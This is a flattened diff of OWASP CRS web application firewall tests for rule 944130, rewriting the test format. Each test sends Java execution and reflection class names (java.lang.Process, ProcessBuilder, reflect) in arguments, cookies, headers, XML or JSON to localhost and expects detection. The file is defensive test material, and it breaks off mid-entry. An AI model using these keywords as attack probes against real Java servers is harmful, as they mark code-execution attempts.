Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Process=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-313 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Process=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 313 desc: "Request header test includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Process - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-314 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Process + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 314 desc: "XML attribute value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-315 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 315 desc: "XML element value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-316 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log: + expect_ids: [944130] + - test_id: 316 desc: "Nested XML element value includes keyword java.lang.Process" stages: - - stage: - 
input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-317 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log: + expect_ids: [944130] + - test_id: 317 desc: "Content-Type text/plain includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-318 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log: + expect_ids: [944130] + - test_id: 318 desc: 
"Content-Type application/json arg value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Process\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-319 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Process\"}" + output: + log: + expect_ids: [944130] + - test_id: 319 desc: "Content-Type application/json arg name includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Process\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-320 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Process\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 320 desc: "Argument test includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-321 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log: + expect_ids: [944130] + - test_id: 321 desc: "Argument name includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-322 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder=test" + output: + log: + expect_ids: [944130] + - test_id: 322 desc: "Cookie test includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.ProcessBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-323 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.ProcessBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 323 desc: "Cookie name includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.ProcessBuilder=test - method: "POST" - uri: 
"/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-324 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.ProcessBuilder=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 324 desc: "Request header test includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.ProcessBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-325 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.ProcessBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 325 desc: "XML attribute value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-326 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 326 desc: "XML element value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-327 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log: + expect_ids: [944130] + - test_id: 327 desc: "Nested XML element value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - 
port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-328 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log: + expect_ids: [944130] + - test_id: 328 desc: "Content-Type text/plain includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-329 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log: + expect_ids: [944130] + - test_id: 329 desc: 
"Content-Type application/json arg value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.ProcessBuilder\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-330 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.ProcessBuilder\"}" + output: + log: + expect_ids: [944130] + - test_id: 330 desc: "Content-Type application/json arg name includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.ProcessBuilder\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-331 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.ProcessBuilder\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 331 desc: "Argument test includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-332 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log: + expect_ids: [944130] + - test_id: 332 desc: "Argument name includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.reflect=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-333 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.reflect=test" + output: + log: + expect_ids: [944130] + - test_id: 333 desc: "Cookie test includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.reflect - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-334 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.reflect + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 334 desc: "Cookie name includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.reflect=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-335 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.reflect=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 335 desc: "Request header test includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.reflect - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-336 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.reflect + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 336 desc: "XML attribute value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-337 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 337 desc: "XML element value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-338 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log: + expect_ids: [944130] + - test_id: 338 desc: "Nested XML element value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-339 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log: + expect_ids: [944130] + - test_id: 339 desc: "Content-Type text/plain includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-340 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log: + expect_ids: [944130] + - test_id: 340 desc: "Content-Type application/json arg value includes keyword 
